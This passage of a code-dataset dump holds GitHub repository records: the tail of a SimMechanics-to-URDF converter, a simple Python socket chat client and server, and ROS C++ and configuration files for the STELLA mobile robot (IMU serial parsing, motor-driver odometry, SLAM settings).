sensor_el;\n\n def getURDFSensor(self, linkName, sensorType, sensorName, origin_el):\n sensor_el = lxml.etree.Element(\"sensor\")\n sensor_el.set(\"name\", sensorName);\n sensor_el.set(\"type\", sensorType);\n parent_el = lxml.etree.SubElement(sensor_el, \"parent\");\n parent_el.set(\"link\", linkName);\n sensor_el.append(origin_el);\n\n return sensor_el;\n\n\nclass URDFGazeboSensorsGenerator:\n def __init__(self):\n self.dummy = \"\"\n\n def getURDFForceTorque(self, jointName, sensorName, directionChildToParent, sensorBlobs, frame, pose, updateRate=100):\n gazebo_el = lxml.etree.Element(\"gazebo\", reference=jointName)\n sensor_el = lxml.etree.SubElement(gazebo_el, \"sensor\")\n sensor_el.set(\"name\", sensorName);\n always_on_el = lxml.etree.SubElement(sensor_el, \"always_on\")\n always_on_el.text = str(1);\n update_rate_el = lxml.etree.SubElement(sensor_el, \"update_rate\")\n update_rate_el.text = str(updateRate);\n sensor_el.set(\"type\", \"force_torque\");\n force_torque_el = lxml.etree.SubElement(sensor_el, \"force_torque\")\n frame_el = lxml.etree.SubElement(force_torque_el, \"frame\")\n if (frame is not None):\n assert(frame == \"child\" or frame == \"parent\" or frame == \"sensor\")\n frame_el.text = frame;\n else:\n frame_el.text = \"child\";\n pose_el = lxml.etree.SubElement(sensor_el, \"pose\");\n pose_el.text = pose;\n measure_direction_el = lxml.etree.SubElement(force_torque_el, \"measure_direction\")\n if (directionChildToParent):\n measure_direction_el.text = \"child_to_parent\"\n else:\n measure_direction_el.text = \"parent_to_child\"\n\n addXMLBlobs(sensorBlobs, sensor_el)\n\n return gazebo_el;\n\n def getURDFSensor(self, linkName, sensorType, sensorName, pose, updateRate, sensorBlobs):\n # sys.stderr.write(\"Link name is \" + str(linkName) + \"\\n\");\n gazebo_el = lxml.etree.Element(\"gazebo\", reference=linkName)\n sensor_el = lxml.etree.SubElement(gazebo_el, \"sensor\")\n sensor_el.set(\"name\", sensorName);\n always_on_el = lxml.etree.SubElement(sensor_el, \"always_on\")\n always_on_el.text = str(1);\n update_rate_el = lxml.etree.SubElement(sensor_el, \"update_rate\")\n update_rate_el.text = str(updateRate);\n sensor_el.set(\"type\", sensorType);\n pose_el = lxml.etree.SubElement(sensor_el, \"pose\");\n pose_el.text = pose;\n\n addXMLBlobs(sensorBlobs, sensor_el)\n\n return gazebo_el;\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Convert (first generation) SimMechanics XML files to URDF')\n parser.add_argument('filename', nargs='?', help='input SimMechanics (first generation) xml file')\n parser.add_argument('--csv-joints', dest='csv_joints_config', nargs='?', action='store',\n help='CSV joints configuration file (for options of single joints)')\n parser.add_argument('--yaml', dest='yaml_config', nargs='?', action='store',\n help='YAML configuration file (for global options)')\n parser.add_argument('--output', dest='mode', nargs='?', action='store', default='xml',\n help='output mode, possible options are xml (URDF output, default), graph (DOT output) or none')\n parser.add_argument('--outputfile', dest='outputfile_name', nargs='?', action='store',\n help='output file, use to save the output to a file (if not given the output is printed in the terminal)')\n\n '''\n argc = len(sys.argv)\n if argc == 3:\n filename = sys.argv[1]\n yaml_config = None\n mode = sys.argv[2]\n elif argc == 4:\n filename = sys.argv[1]\n yaml_config = sys.argv[2]\n mode = sys.argv[3]\n else:\n print(\"Usage: \" + sys.argv[0] + \"{XML filename} --yaml [yaml_configfile] 
--csv-joints [csv_joints_configfile] --output {xml|graph|none}\")\n '''\n args = parser.parse_args()\n\n con = Converter()\n con.convert(args.filename, args.yaml_config, args.csv_joints_config, args.mode, args.outputfile_name)\n\n\nif __name__ == '__main__':\n main()\n" } ]
5
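A note on the rigid-body helpers in the converter record above: `Invert4x4Matrix` uses the closed form [R p; 0 1]^-1 = [R^T  -R^T p; 0 1], which is valid only while the upper-left 3x3 block is a proper rotation. A minimal standalone check of that identity — plain NumPy, restated here rather than imported from the repo, with an arbitrary test transform — looks like this:

import math
import numpy

def invert_4x4(matrix):
    # Closed-form inverse of a homogeneous transform; assumes the 3x3
    # block R is orthonormal, as in the converter's Invert4x4Matrix.
    ret = numpy.identity(4)
    R = matrix[:3, :3]
    p = matrix[:3, 3]
    ret[:3, :3] = R.T
    ret[:3, 3] = -R.T.dot(p)
    return ret

c, s = math.cos(0.3), math.sin(0.3)  # arbitrary rotation about z
T = numpy.array([[c, -s, 0.0, 1.0],
                 [s,  c, 0.0, 2.0],
                 [0.0, 0.0, 1.0, 3.0],
                 [0.0, 0.0, 0.0, 1.0]])
assert numpy.allclose(invert_4x4(T), numpy.linalg.inv(T))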
Crwing/my_chat_pro
https://github.com/Crwing/my_chat_pro
08a23620d2c264e8ffc0af3dc527dcb42065a1e6
a8a92c06825a1cf7951ede1cf2517403830eb4c5
de7e85cfa3e134ffc515c75418f45c42a2708993
refs/heads/master
2023-01-20T07:04:43.201067
2020-11-16T05:30:08
2020-11-16T05:30:08
311,849,600
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6012084484100342, "alphanum_fraction": 0.6193353533744812, "avg_line_length": 15.550000190734863, "blob_id": "b346729f6ae3b0da15de5ef53b9c63451f22873e", "content_id": "47f5c4ebcf34d95be311ad77abd0fa99786be952", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 359, "license_type": "no_license", "max_line_length": 67, "num_lines": 20, "path": "/demo/testThread.py", "repo_name": "Crwing/my_chat_pro", "src_encoding": "UTF-8", "text": "import threading\n\nimport threading\nimport time\n\n\ndef show(arg):\n time.sleep(1)\n print(\"thread \" + str(arg) + \" running......\")\n\n\nfor i in range(10):\n t = threading.Thread(target=show, args=(i,)) # 注意传入的参数一定是一个元组!\n print('This is the main program', i)\n t.start()\n\nfor i in range(10):\n time.sleep(1)\n\nprint('end')\n" }, { "alpha_fraction": 0.6594203114509583, "alphanum_fraction": 0.6823671460151672, "avg_line_length": 32.119998931884766, "blob_id": "3a3b643390099a8b81b557bc8863d8b4e664d404", "content_id": "75314f8e967d808cb09726fbd503fb589218c480", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 828, "license_type": "no_license", "max_line_length": 82, "num_lines": 25, "path": "/demo/client.py", "repo_name": "Crwing/my_chat_pro", "src_encoding": "UTF-8", "text": "import socket\nimport threading\n\n\ndef receive_message(client_socket):\n while True:\n recv_messsage = client_socket.recv(1024)\n if recv_messsage:\n print('Message Recieved: ')\n print(recv_messsage.decode('UTF-8'))\n\n\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_socket.connect(('45.32.130.93', 9001))\nuserName = input('Please input your user name:')\ntargetUserName = input(\"Please input your friend's name:\")\nmessDict = {'userName': userName, 'targetUserName': targetUserName, 'content': ''}\n\nthread = threading.Thread(target=receive_message, args=(client_socket,))\nthread.start()\nwhile True:\n message = ''\n message = input('Please input message: ')\n message = targetUserName + '/' + userName + '/' + message\n client_socket.send(message.encode('UTF-8'))\n" }, { "alpha_fraction": 0.6098505854606628, "alphanum_fraction": 0.6189817190170288, "avg_line_length": 31.26785659790039, "blob_id": "f1a0834b9d498314806f97dc13884c653e0852a3", "content_id": "6255108e5838988a1250a373929938a33884f821", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3614, "license_type": "no_license", "max_line_length": 108, "num_lines": 112, "path": "/demo/server.py", "repo_name": "Crwing/my_chat_pro", "src_encoding": "UTF-8", "text": "import socket\nimport threading\nimport queue\nimport time\nimport sys\n\n\ndef split_message(message):\n splited_messages = message.split('/')\n targetContact = splited_messages[0]\n sourceContact = splited_messages[1]\n messageContent = splited_messages[2]\n return targetContact, sourceContact, messageContent\n\n\ndef add_message2queue(targetContact, sourceContact, meesageContent, contactDict):\n message = targetContact + '/' + sourceContact + '/' + meesageContent\n try:\n q = contactDict[targetContact]\n except KeyError as e:\n q = queue.Queue()\n print(message)\n q.put(message)\n contactDict[targetContact] = q\n else:\n q.put(message)\n\n\ndef find_address_by_user(target_user, user_address_dict):\n return user_address_dict[target_user]\n\n\ndef log_user_address(souceContact, addr, user_address_dict):\n try:\n address = 
user_address_dict[souceContact]\n except KeyError as e:\n user_address_dict[souceContact] = addr\n\n\ndef send_queue_message(sock, contactsDict, user_address_dict, my_addr):\n while True:\n time.sleep(1)\n if not contactsDict:\n print('currently no message in queue')\n send_contactsDict = dict(contactsDict)\n for target_user, message_queue in send_contactsDict.items():\n try:\n addr = find_address_by_user(target_user, user_address_dict)\n except KeyError as e:\n continue\n if my_addr != addr:\n continue\n while not message_queue.empty():\n mix_message = message_queue.get().split('/')\n sourceContact = mix_message[0]\n messageContent = mix_message[2]\n message = 'You friend ' + sourceContact + ' send a message to you:' + messageContent + '\\n'\n sock.sendto(message.encode('UTF-8'), addr)\n if message_queue.empty():\n try:\n contactsDict.pop(target_user)\n except KeyError as e:\n continue\n\n\ndef receive_message(sock, addr, contactsDict, user_address_dict):\n print(addr)\n sock.setblocking(0)\n thread = threading.Thread(target=send_queue_message, args=(sock, contactsDict, user_address_dict, addr))\n thread.start()\n while True:\n try:\n message = sock.recv(1024)\n except BlockingIOError as e:\n time.sleep(2)\n message = None\n continue\n if message:\n messageDecoded = message.decode('UTF-8')\n if messageDecoded:\n targetContact, sourceContact, messageContent = split_message(messageDecoded)\n add_message2queue(targetContact, sourceContact, messageContent, contactsDict)\n log_user_address(sourceContact, addr, user_address_dict)\n print(messageDecoded)\n # return_message = get_recvd_message(sourceContact, contactsDict)\n # sock.sendto(return_message.encode('UTF-8'), addr)\n else:\n print('Click')\n sys.exit()\n break\n\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind(('45.32.130.93', 9001))\nserver_socket.listen(5)\nthreads = []\nuser_address_dict = {}\ncontactsDict = {}\n\nprint('Waiting for connection...')\n\nfor i in range(10):\n sock, addr = server_socket.accept()\n print(sock, addr)\n thread = threading.Thread(target=receive_message, args=(sock, addr, contactsDict, user_address_dict))\n thread.start()\n threads.append(thread)\n\nprint('all thread are started')\n\nfor j in threads:\n j.join()\n" }, { "alpha_fraction": 0.5789473652839661, "alphanum_fraction": 0.6315789222717285, "avg_line_length": 22.75, "blob_id": "d11dc887526e0466690e8ee95550e2fea685075c", "content_id": "132bc356437dc42fc0e52bb7be85d1de5b971436", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 42, "num_lines": 4, "path": "/demo/test_dict.py", "repo_name": "Crwing/my_chat_pro", "src_encoding": "UTF-8", "text": "dict1 = {'hello': 'hello', 'fuck': 'fuck'}\ndict2 = dict(dict1)\ndict2.pop('hello')\nprint(dict1)\n" } ]
4
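One fragility in the chat server captured above: messages are framed as `target/source/content` and parsed with a bare `split('/')`, so any content containing a slash is truncated at that slash. A bounded split preserves the remainder. This is a standalone sketch of the safer parse, not code taken from the repo:

def split_message(message):
    # At most two splits, so slashes inside the content survive intact.
    target, source, content = message.split('/', 2)
    return target, source, content

assert split_message('bob/alice/see http://example.com/x') == (
    'bob', 'alice', 'see http://example.com/x')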
ntrexlab/STELLA
https://github.com/ntrexlab/STELLA
d42259bb9f24cf2e32671b07ad7921d7abdfd507
40dde3e15ff3ca6a1db245068488e8fb2ec629f5
07041f9e158454690ccbd5f1e83fc9ea97c2f24c
refs/heads/main
2023-07-15T17:01:31.531709
2021-08-20T08:49:21
2021-08-20T08:49:21
385,102,537
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4183523952960968, "alphanum_fraction": 0.46525946259498596, "avg_line_length": 35.043479919433594, "blob_id": "ebd6f6d52cfb4603c5695037bcd6f884b12cad04", "content_id": "412110efbd1c10307b55a0f41de5496ef8405915", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3411, "license_type": "no_license", "max_line_length": 92, "num_lines": 92, "path": "/stella/stella_ahrs/src/listener.cpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include \"listener.h\"\r\n\r\nvoid *AHRS_thread(void *arg)\r\n{\r\n while (run)\r\n {\r\n if (MW_SerialRecv(&id, &length, data))\r\n {\r\n switch ((int)(unsigned char)data[1])\r\n {\r\n case ACC:\r\n acc_x = ((int)(unsigned char)data[2] | (int)(unsigned char)data[3] << 8);\r\n acc_y = ((int)(unsigned char)data[4] | (int)(unsigned char)data[5] << 8);\r\n acc_z = ((int)(unsigned char)data[6] | (int)(unsigned char)data[7] << 8);\r\n\r\n imu.linear_acceleration.x = acc_x / 1000.0 * 9.8;\r\n imu.linear_acceleration.y = acc_y / 1000.0 * 9.8;\r\n imu.linear_acceleration.z = acc_z / 1000.0 * 9.8;\r\n break;\r\n\r\n case GYO:\r\n gyo_x = ((int)(unsigned char)data[2] | (int)(unsigned char)data[3] << 8);\r\n gyo_y = ((int)(unsigned char)data[4] | (int)(unsigned char)data[5] << 8);\r\n gyo_z = ((int)(unsigned char)data[6] | (int)(unsigned char)data[7] << 8);\r\n\r\n imu.angular_velocity.x = gyo_x / 10.0 * 0.01745;\r\n imu.angular_velocity.y = gyo_y / 10.0 * 0.01745;\r\n imu.angular_velocity.z = gyo_z / 10.0 * 0.01745;\r\n break;\r\n\r\n case DEG:\r\n\t\tdeg_x = ((int)(unsigned char)data[2] | (int)(unsigned char)data[3] << 8);\r\n deg_y = ((int)(unsigned char)data[4] | (int)(unsigned char)data[5] << 8);\r\n deg_z = ((int)(unsigned char)data[6] | (int)(unsigned char)data[7] << 8);\r\n\r\n float x = deg_x / 100.0;\r\n float y = deg_y / 100.0;\r\n float z = deg_z / 100.0;\r\n\r\n imu.orientation.w = (COS(z) * COS(y) * COS(x)) + (SIN(z) * SIN(y) * SIN(x));\r\n imu.orientation.x = (COS(z) * COS(y) * SIN(x)) - (SIN(z) * SIN(y) * COS(x));\r\n imu.orientation.y = (COS(z) * SIN(y) * COS(x)) + (SIN(z) * COS(y) * SIN(x));\r\n imu.orientation.z = (SIN(z) * COS(y) * COS(x)) - (COS(z) * SIN(y) * SIN(x));\r\n break;\r\n }\r\n }\r\n }\r\n}\r\n int main(int argc, char **argv)\r\n {\r\n pthread_t thread;\r\n\r\n ros::init(argc, argv, \"mw_ahrs\");\r\n ros::NodeHandle n;\r\n ros::Publisher chatter_pub = n.advertise<sensor_msgs::Imu>(\"imu\", 10);\r\n\r\n MW_SerialOpen(\"/dev/AHRS\", 115200);\r\n pthread_create(&thread, NULL, AHRS_thread, NULL);\r\n\r\n imu.orientation_covariance = {0.0025, 0, 0, 0, 0.0025, 0, 0, 0, 0.0025};\r\n imu.angular_velocity_covariance = {0.02, 0, 0, 0, 0.02, 0, 0, 0, 0.02};\r\n imu.linear_acceleration_covariance = {0.04, 0, 0, 0, 0.04, 0, 0, 0, 0.04};\r\n\r\n imu.linear_acceleration.x = 0;\r\n imu.linear_acceleration.y = 0;\r\n imu.linear_acceleration.z = 0;\r\n\r\n imu.angular_velocity.x = 0;\r\n imu.angular_velocity.y = 0;\r\n imu.angular_velocity.z = 0;\r\n\r\n imu.orientation.w = 0;\r\n imu.orientation.x = 0;\r\n imu.orientation.y = 0;\r\n imu.orientation.z = 0;\r\n\r\n ros::Rate rate(10);\r\n\r\n while (ros::ok())\r\n {\r\n imu.header.frame_id = \"imu_link\";\r\n imu.header.stamp = ros::Time::now();\r\n\r\n chatter_pub.publish(imu);\r\n\r\n ros::spinOnce();\r\n rate.sleep();\r\n }\r\n run = false;\r\n pthread_join(thread,NULL);\r\n return 0;\r\n }\r\n \r\n" }, { "alpha_fraction": 0.59375, "alphanum_fraction": 0.6177884340286255, "avg_line_length": 32.66666793823242, 
"blob_id": "86c739bdea2dfd892809c421a5a8c145257451c9", "content_id": "3c24689074594e055ae970bddf271e9987321ef1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 416, "license_type": "no_license", "max_line_length": 89, "num_lines": 12, "path": "/stella/stella_md/src/mobilerobot.cpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include \"mobilerobot.h\"\r\n\r\nvoid calculate_wheel_vel(float linear, float angular, float *left_rpm, float *right_rpm)\r\n{\r\n float left_speed = 0.0, right_speed = 0.0;\r\n\r\n left_speed = (linear + wheel_to_wheel_d / 2.0 * angular) * motor_scale_const;\r\n right_speed = (linear - wheel_to_wheel_d / 2.0 * angular) * motor_scale_const;\r\n\r\n *left_rpm = left_speed * -1;\r\n *right_rpm = right_speed * -1;\r\n}\r\n" }, { "alpha_fraction": 0.6938775777816772, "alphanum_fraction": 0.7020407915115356, "avg_line_length": 22.700000762939453, "blob_id": "a20f4697f94823915dbc584e000309128d9dacec", "content_id": "0cea045c59ceda801f73f06b6e259dbcfdf67b40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 245, "license_type": "no_license", "max_line_length": 55, "num_lines": 10, "path": "/stella/stella_ahrs/src/MwSerial.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include \"SerialTypedf.hpp\"\r\n#include \"SerialCOM.hpp\"\r\n#include \"UsbSerial.hpp\"\r\n\r\n\r\nint MW_SerialOpen(char *Port, int BaudRate);\r\n\r\nint MW_SerialRecv(long *ID, int *length, char data[8]);\r\n\r\nint MW_SerialSend(long ID, int length, char data[8]);" }, { "alpha_fraction": 0.6525423526763916, "alphanum_fraction": 0.6549636721611023, "avg_line_length": 15.574467658996582, "blob_id": "8fa76a5dd538cbd6f22b926aff38348c0e8cb061", "content_id": "497d7c78aa74e575bfd0898fe1af79d332647652", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 826, "license_type": "no_license", "max_line_length": 53, "num_lines": 47, "path": "/stella/stella_ahrs/src/UsbSerial.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include <deque>\r\n\r\n#include \"UsbPacket.hpp\"\r\n#include \"SerialCOM.hpp\"\r\n\r\n#include \"Lock.hpp\"\r\n\r\nusing namespace std;\r\ntypedef unsigned int UINT;\r\ntypedef void *LPVOID;\r\n\r\nstatic deque<Usb2Packet> _queueReceive;\r\n\r\nclass SerialCoM;\r\n\r\nclass UsbSerial\r\n{\r\npublic:\r\n UsbSerial();\r\n ~UsbSerial();\r\n\r\n pthread_t ThreadTransmit_;\r\n pthread_t ThreadReceive_;\r\n\r\n void ThreadStart();\r\n void ThreadStop();\r\n void *ThreadTransmit();\r\n void *ThreadReceive();\r\n static void *ThreadReceiveStatic(LPVOID pParam);\r\n static void *ThreadTransmitStatic(LPVOID pParam);\r\n bool ReceiveSerialMessage(SerialMessage &pkt);\r\n\r\n bool _stopReqThreadTransmit;\r\n bool _stopReqThreadReceive;\r\n\r\n \r\n\r\nprotected:\r\n UsbPacket *_bus;\r\n SerialCOM *_bus2;\r\n\r\nprivate:\r\n \r\n CLock _lockReceive;\r\n \r\n\r\n};\r\n" }, { "alpha_fraction": 0.5929918885231018, "alphanum_fraction": 0.5929918885231018, "avg_line_length": 13.458333015441895, "blob_id": "365238b0c73907e20179fbe1da928aeac8e807f8", "content_id": "66a4959b3087129597d206d0481e1559d3023e6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 371, "license_type": "no_license", "max_line_length": 49, "num_lines": 24, "path": "/stella/stella_ahrs/src/SerialCOM.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", 
"text": "#pragma once\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <termios.h>\r\n#include <unistd.h>\r\n\r\n\r\nclass SerialCOM\r\n{\r\nprivate:\r\n\r\npublic:\r\n SerialCOM();\r\n ~SerialCOM();\r\n\r\n int Usb_Serial_Open(char *str, int BaudRate);\r\n int __Read(char *buff);\r\n int __Write(char *buff, int length);\r\n void Close();\r\n};\r\n" }, { "alpha_fraction": 0.48681896924972534, "alphanum_fraction": 0.5553602576255798, "avg_line_length": 54.900001525878906, "blob_id": "169cfaf138448bac3a6f46bc5a9d1487483737f2", "content_id": "1e576883ecfebf0764afaa4b29896b03fe62ae4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 703, "license_type": "no_license", "max_line_length": 114, "num_lines": 10, "path": "/stella/stella_md/src/mobilerobot.h", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#define wheel_to_wheel_d 0.337 // 바퀴와 바퀴 간 거리 [m]\r\n#define distance_per_rev 0.5652 // 한바퀴 회전시 이동 거리 [m / rev]\r\n#define pulse_per_rev 54000 // 한바퀴 회전시 엔코더 펄스 카운트(이 값은 부착된 엔코더와 감속기를 고려해 정해진다.) [pulse / rev]\r\n#define pulse_per_distance 95541.4012739 // 1m 이동시 엔코더 펄스 카운트 [pulse / m]\r\n#define gear_ratio 27 // 감속비\r\n#define motor_scale_const 106.1032954 // m/s to rpm\r\n\r\n\r\n\r\nvoid calculate_wheel_vel(float linear, float angular, float *left_rpm, float *right_rpm);\r\n" }, { "alpha_fraction": 0.6731571555137634, "alphanum_fraction": 0.7009735703468323, "avg_line_length": 31.395349502563477, "blob_id": "0c5f5105da3e093f57447ca491b124d5b65c3286", "content_id": "d3d957a89370a084998d28b448e0b6f8efca49cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 1438, "license_type": "no_license", "max_line_length": 111, "num_lines": 43, "path": "/stella_slam/config/stella_backup.lua", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "include \"map_builder.lua\"\r\ninclude \"trajectory_builder.lua\"\r\n\r\noptions = {\r\n map_builder = MAP_BUILDER,\r\n trajectory_builder = TRAJECTORY_BUILDER,\r\n map_frame = \"map\",\r\n tracking_frame = \"odom\", -- imu_link, If you are using gazebo, use 'base_footprint' (libgazebo_ros_imu's bug)\r\n published_frame = \"odom\",\r\n odom_frame = \"odom\",\r\n provide_odom_frame = false,\r\n publish_frame_projected_to_2d = false,\r\n use_odometry = true,\r\n use_nav_sat = false,\r\n use_landmarks = false,\r\n num_laser_scans = 1,\r\n num_multi_echo_laser_scans = 0,\r\n num_subdivisions_per_laser_scan = 1,\r\n num_point_clouds = 0,\r\n lookup_transform_timeout_sec = 0.2,\r\n submap_publish_period_sec = 0.3,\r\n pose_publish_period_sec = 5e-3,\r\n trajectory_publish_period_sec = 30e-3,\r\n rangefinder_sampling_ratio = 1.,\r\n odometry_sampling_ratio = 0.1,\r\n fixed_frame_pose_sampling_ratio = 1.,\r\n imu_sampling_ratio = 0.1,\r\n landmarks_sampling_ratio = 1.,\r\n}\r\n\r\nMAP_BUILDER.use_trajectory_builder_2d = true\r\n\r\nTRAJECTORY_BUILDER_2D.min_range = 0.1\r\nTRAJECTORY_BUILDER_2D.max_range = 3.5\r\nTRAJECTORY_BUILDER_2D.missing_data_ray_length = 3.\r\nTRAJECTORY_BUILDER_2D.use_imu_data = false \r\nTRAJECTORY_BUILDER_2D.use_online_correlative_scan_matching = true\r\nTRAJECTORY_BUILDER_2D.motion_filter.max_angle_radians = math.rad(0.1)\r\n\r\nPOSE_GRAPH.constraint_builder.min_score = 0.65\r\nPOSE_GRAPH.constraint_builder.global_localization_min_score = 0.7\r\n\r\nreturn options\r\n\r\n" }, { "alpha_fraction": 0.6065573692321777, "alphanum_fraction": 0.6495901346206665, 
"avg_line_length": 21.80487823486328, "blob_id": "112b71c3fc95e502117e4e33e2e0efcb3d683857", "content_id": "70d9aea5ba359b6ed8fc49484661573d43a529c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 976, "license_type": "no_license", "max_line_length": 107, "num_lines": 41, "path": "/stella/stella_ahrs/src/listener.h", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include <thread>\r\n#include <ros/ros.h>\r\n#include <fcntl.h> // Contains file controls like O_RDWR\r\n#include <errno.h> // Error integer and strerror() function\r\n#include <termios.h> // Contains POSIX terminal control definitions\r\n#include <unistd.h> // write(), read(), close()\r\n#include <sensor_msgs/Imu.h>\r\n#include <vector>\r\n#include <sstream>\r\n#include <iostream>\r\n#include <stdlib.h>\r\n#include <tf2/LinearMath/Quaternion.h>\r\n#include <math.h>\r\n#include <pthread.h>\r\n#include \"MwSerial.hpp\"\r\n\r\n\r\n#define DEG2RAD( a ) ( (a) * (M_PI/180.0f) )\r\n#define COS(a) cos(DEG2RAD(a))\r\n#define SIN(a) sin(DEG2RAD(a))\r\n\r\n#define DeviceID 0x01\r\n#define STX 0x02\r\n#define ETX 0x03\r\n#define Command 0xF0\r\n\r\n#define ACC 0x33\r\n#define GYO 0x34\r\n#define DEG 0x35\r\n\r\n\r\nusing namespace std;\r\n\r\nchar data[8];\r\nlong id = 0;\r\nint length = 0;\r\nbool run = true;\r\n\r\nint16_t acc_x = 0, acc_y = 0, acc_z = 0, gyo_x = 0, gyo_y = 0, gyo_z = 0, deg_x = 0, deg_y = 0, deg_z = 0; \r\n\r\nsensor_msgs::Imu imu;\r\n" }, { "alpha_fraction": 0.5980551242828369, "alphanum_fraction": 0.5980551242828369, "avg_line_length": 15.685714721679688, "blob_id": "d4cc58a1cd03f37278f771d5ada9f7dba816dff0", "content_id": "45b4803d91483b763aa60d63724450252675ea73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 733, "license_type": "no_license", "max_line_length": 66, "num_lines": 35, "path": "/stella/stella_ahrs/src/Lock.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include<pthread.h>\r\n\r\n#pragma once\r\n\r\nclass CLock \r\n{\r\nprivate:\r\n\tpthread_mutex_t m;\r\n\tpthread_cond_t sync_cond;\r\npublic:\r\n\tCLock() \r\n\t{\r\n\t\t// 뮤텍스 속성 변수 생성\r\n\t\tpthread_mutexattr_t mAttr;\r\n\t\t// 뮤텍스 속성에 대한 재귀 뮤텍스 설정\r\n\t\tpthread_mutexattr_settype (& mAttr, PTHREAD_MUTEX_RECURSIVE_NP);\r\n\t\t// mutex 속성을 사용하여 mutex 생성\r\n\t\tpthread_mutex_init (& m, & mAttr);\r\n\t\t// 뮤텍스 변수를 초기화 한 후 뮤텍스 속성을 삭제할 수 있습니다.\r\n\t\tpthread_mutexattr_destroy (& mAttr);\r\n\t}\r\n \t~CLock()\r\n\t{\r\n\t\t pthread_mutex_destroy (& m);\r\n\t}\r\n\r\n\tinline void Lock()\r\n\t{\r\n\t\tpthread_mutex_lock (&m);\r\n\t}\r\n\tinline void Unlock() \r\n\t{\r\n\t\tpthread_mutex_unlock(&m);\r\n\t}\r\n};" }, { "alpha_fraction": 0.6645077466964722, "alphanum_fraction": 0.6774611473083496, "avg_line_length": 26.518518447875977, "blob_id": "412a4251ca00d38f3582c91fc43d5a350a473e66", "content_id": "aa5cdf9fa9c76410c24233591e882774feccc2be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 772, "license_type": "no_license", "max_line_length": 88, "num_lines": 27, "path": "/stella/ydlidar_ros/sdk/samples/CMakeLists.txt", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "\r\ncmake_minimum_required(VERSION 2.8)\r\nPROJECT(ydlidar_test)\r\nset(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -std=c++11\")\r\nadd_definitions(-std=c++11) # Use C++11\r\n\r\nset(YDLIDAR_INCLUDE_DIRS ${CMAKE_CURRENT_SOURCE_DIR}/../include)\r\nIF (WIN32)\r\nlist(APPEND 
YDLIDAR_LIBRARIES ${CMAKE_CURRENT_SOURCE_DIR}/../lib/libydlidar_driver.dll)\r\nELSE()\r\nlist(APPEND YDLIDAR_LIBRARIES ${CMAKE_CURRENT_SOURCE_DIR}/../lib/libydlidar_driver.so)\r\nENDIF()\r\n\r\n\r\n#Include directories\r\nINCLUDE_DIRECTORIES(\r\n ${CMAKE_SOURCE_DIR}\r\n ${CMAKE_SOURCE_DIR}/../\r\n ${CMAKE_CURRENT_BINARY_DIR}\r\n ${YDLIDAR_INCLUDE_DIRS}\r\n)\r\n\r\n\r\nADD_EXECUTABLE(${PROJECT_NAME}\r\n main.cpp)\r\n\r\n# Add the required libraries for linking:\r\nTARGET_LINK_LIBRARIES(${PROJECT_NAME} ${YDLIDAR_LIBRARIES})\r\n" }, { "alpha_fraction": 0.499316543340683, "alphanum_fraction": 0.513571560382843, "avg_line_length": 23.984771728515625, "blob_id": "42a3279678bf643ad03b6046940366df64419914", "content_id": "70563c0b93b0c1eae09ff9df33e2d6203c96f5ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5121, "license_type": "no_license", "max_line_length": 116, "num_lines": 197, "path": "/stella/stella_md/src/listener.cpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include \"listener.h\"\r\n#include \"mobilerobot.h\"\r\n\r\nntrex_can_fifo::ntrex_can_fifo()\r\n{\r\n chatter_pub = n.advertise<nav_msgs::Odometry>(\"odom\", 50);\r\n sub = n.subscribe(\"cmd_vel\", 10, &ntrex_can_fifo::chatterCallback, this);\r\n\r\n thread_read_AHRS = new std::thread(&ntrex_can_fifo::readStatus, this);\r\n}\r\n\r\nntrex_can_fifo::~ntrex_can_fifo()\r\n{\r\n thread_read_AHRS->join();\r\n\r\n delete thread_read_AHRS;\r\n close(serial_port);\r\n}\r\n\r\nvoid ntrex_can_fifo::MD_input(char *str)\r\n{\r\n if (!strcmp(str, \"move\"))\r\n {\r\n sprintf(write_buf, \"mvc=%0.3f,%0.3f\\r\\n\", left_rpm, rigth_rpm); //\r\n\r\n for (int i = 0; i < strlen(write_buf); i++)\r\n {\r\n unsigned char buf = (unsigned char)(write_buf[i]);\r\n write(serial_port, &buf, 